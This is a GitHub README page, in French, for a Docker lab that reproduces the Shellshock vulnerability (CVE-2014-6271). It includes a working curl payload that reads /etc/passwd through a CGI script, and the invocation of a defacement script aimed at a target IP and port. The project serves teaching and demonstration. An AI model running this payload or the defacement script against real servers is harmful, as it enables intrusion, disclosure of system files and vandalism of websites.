Skip to content

Projet de présentation d'une CVE (ShellShock) avec pdf, démonstration technique et reproductible

Notifications You must be signed in to change notification settings

RadYio/CVE-2014-6271

Repository files navigation

CVE-2014-6271

Description

Ce projet permet de reproduire la vulnérabilité CVE-2014-6271, également connue sous le nom de Shellshock. Shellshock est une vulnérabilité de sécurité dans Bash qui permet d'exécuter du code malveillant via des variables d'environnement.

Le but de ce projet est de démontrer l'impact de cette vulnérabilité sur un environnement Docker.

Prérequis

Avant de commencer, assurez-vous d'avoir Docker installé sur votre machine. Vous pouvez télécharger Docker ici.

Installation et lancement

1. Construire l'image Docker

Dans le répertoire du projet, construisez l'image Docker en exécutant la commande suivante :

docker build -t ['image name'] .

Remplacez ['image name'] par le nom que vous souhaitez donner à l'image Docker.

2. Lancer le conteneur Docker

Une fois l'image construite, lancez un conteneur à partir de cette image avec la commande suivante :

docker run -it --rm -p 8080:80 ['image name']

Cela exposera le service sur le port 8080 de votre machine locale.

3. Accéder à l'application

Ouvrez votre navigateur et accédez à http://localhost:8080. Vous pourrez observer le comportement de l'application et tester la vulnérabilité.

4-1. Exploiter la vulnérabilité

Dans un autre terminal, exécutez la commande suivante pour exploiter la vulnérabilité et lire le contenu du fichier /etc/passwd :

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

Cette commande envoie un en-tête user-agent spécialement conçu pour exploiter Shellshock. Si la vulnérabilité est correctement reproduite, le contenu de /etc/passwd s'affichera dans la sortie du terminal.

4-2. Exploiter la vulnérabilité (script exp_deface.sh)

Ce script permet d'exploiter la pour défacer une page web cible. La vulnérabilité repose sur une mauvaise configuration de scripts CGI, qui permet l'exécution de commandes arbitraires sur le serveur.

Pré-requis : Assurez-vous que la cible est vulnérable au bug ShellShock. Assurez-vous d'avoir les permissions nécessaires pour tester l'exploit sur cette cible.

./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

Sécurité

Important : Cette vulnérabilité ne doit être utilisée qu'à des fins de test et de démonstration dans un environnement contrôlé. N'utilisez pas ce projet dans des environnements de production.

About

Projet de présentation d'une CVE (ShellShock) avec pdf, démonstration technique et reproductible

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published